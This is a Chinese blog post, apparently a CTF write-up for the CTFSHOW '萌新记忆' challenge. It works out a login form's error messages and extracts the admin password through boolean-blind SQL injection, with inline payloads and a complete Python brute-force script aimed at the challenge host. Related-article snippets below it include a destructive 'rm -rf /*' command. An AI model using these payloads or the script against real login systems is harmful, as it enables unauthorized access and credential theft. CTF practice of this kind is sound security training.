CTFSHOW 萌新赛 萌新记忆

最新推荐文章于 2024-05-30 22:15:04 发布
最新推荐文章于 2024-05-30 22:15:04 发布
阅读量1k 收藏
点赞数 3
分类专栏: ctf 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chizhaji/article/details/113759638
版权

CTFSHOW 萌新赛 萌新记忆

吐槽一下我感觉萌新这个词在侮辱我,我还搞了半天

进去之后查看源代码,把能点的地方都点一下发现没有什么可以搞的,就打开了御剑来扫描了一波,发现了admin目录进去要让我登陆,首先用了一句话,进去看到一个"我要报警了"(因为我比较懒不想一个个试,把抓的包保存下来用sqlmap跑了一下发现注入不成功看来就只能自己一个一个的试试了)

再经过半个多小时的努力之下发现一共有三种报错结果

①用户名/密码错误:当输入的用户名不为admin且不超过限制的长度时
②用户名错误:用户名长度超过限制(字符长度最大为20)
③密码错误:输入用户名为admin

看来这道题是想让我们拿到admin的密码

首先尝试了一下能不能知道密码的 长度

payload u='||length(p)<'100&p=1

经过尝试之后发现密码的长度17

然后再查看每一位的密码

'||substr(p,1,1)<'a

import requests

url='http://d6a7e13f-2074-43c2-82aa-d3f336edd4df.chall.ctf.show:8080/admin/checklogin.php'
s='0123456789abcdefghijklmnopqrstuvwxyz'
password=''
flag=''
for i in range(1,18):
    print("第"+str(i)+"位")
    for j in s:
        data={"u":"'||substr(p,"+str(i)+",1)<'"+j,"p":"1"}

        r=requests.post(url,data=data)

        if "密码错误"==r.text:
            password+=chr(ord(j)-1)
            print(password)
            break
        
data={"u":"admin","p":password}
print(data)

rep=requests.post(url,data=data)

flag=rep.text
print(flag)
不上钻石不改名
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW 萌新
qq_45655564的博客
08-10 970
给她 听名字是git泄露,但是不知道是不是我的字典有问题,没有扫出来有用的信息。 结果只能翻别人的wp了,得知了hint.php <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> sprintf是有一个漏洞的,就是占位符漏洞。 ...
ctfshow-萌新记忆
XYH_233的博客
03-18 506
ctfshow 萌新记忆
CTFSHOW--萌新
最新发布
qq_75120258的博客
05-30 899
打开环境以为是SQL注入,尝试输入SQL语句/?name=asd',发现被转义了题目是给她,和git很相似,使用dirsearch扫一扫发现git泄露,使用GITHACK工具扫到一个hit.php。
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7129
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
BUUCTF__[HCTF 2018]admin_题解
风过江南乱的博客
05-18 1548
一、看题 拿到题目,发现一个欢迎页面。有注册、登录功能。 首先习惯性 F12。发现提示。 提示不是 admin ,那我们尝试登录用户名 admin ,密码随便输入,提示密码错误。尝试注 册 admin ,提示账号已被注册,那么我们怎么才能用 admin 登录呢。 那先尝试随便注册一个账号登录看看有什么内容,注册用户名和密码都为1,登录。 发现有修改密码功能。 可以注册、登录、修改密码,很自然的到二次注入。 事实上,预期解的确是二次注入,只不过有好几种非预期解法。 二、研究 这题得到flag,实
CTFshow_萌新(web)
果粒程
01-09 496
CTFshow_萌新(web)
CTFshow_萌新(密码)
果粒程
12-15 729
CTFshow_萌新(密码)
ctfshow简单题web1-15
qq_62984336的博客
03-10 927
ctfshow萌新 ctfshow萌新web1web2-4web5-7web5web6web7web9web10web11web12web13web14、15 总结:这几题主要都是正则匹配字符过滤的绕过,基本步骤都是源码中查看过滤规则->找到注入点->传入payload。只在web1中写了比较完整的步骤,剩下的题目主要只说对于字符过滤的绕过方法。 web1 1.手动注入。需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 .
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow 萌新web题解
qq_41788704的博客
10-09 1286
web1 十六进制 0x38e web2 异或 200^800 按位与 992|8 web3 加减乘除都可以 --1000 负负得正 web4 id=1 or 1=1# id=id# 上面是显示所有的数据,flag自然也会在里面 ‘1000’ MySQL会自动转换类型 web5 异或 144^888 web6 取反 ~~1000 web7 二进制 0b1111101000 web8 rm -rf /* 删库跑路?? web9 可以直接执行命令 system('cat config.php
ctfshow萌新计划类web全解 wp
arcuied
11-25 1386
ctfshow萌新计划类web全解 wp
ctfshow之_萌新web1至web7
XiaoXiao_RenHe的专栏
04-29 1453
ctfshow之_萌新web1至web7问题解答;intval、~~sql语句的2次取反、|或运算、^异或运算、
CTFShow:萌新web1
weixin_64089259的博客
04-14 908
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
ctfshow 萌新记忆
m0_68074153的博客
08-19 495
bool盲注
CTFshow——萌新记忆
D.MIND 的博客
03-15 1360
一进来,看了前两篇悲惨记忆,忽记起我还要做题呢,于是赶紧寻找线索… 发现页面都没什么可利用的,尝试访问别的页面,用dirsearch可以扫描出/admin/目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin后面加/ (多么菜的领悟>_<) 来到一个登录页面,随手试试or和and,返回要报警的信息,用burp来Fuzz一下 发现and or # - if =等都被过滤了 但( ) || , substr length可以用,||可以代替or 那么就是bool盲注了 经过尝试是会发
ctfshow web萌新
09-01
对于CTF Show的web,作为一个萌新,你可以尝试以下几个方向来提升自己的能力: 1. 学习Web基础知识:了解HTTP协议、HTML、CSS、JavaScript等基础知识,并掌握常见的Web漏洞类型和攻防技巧,如跨站脚本攻击(XSS)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值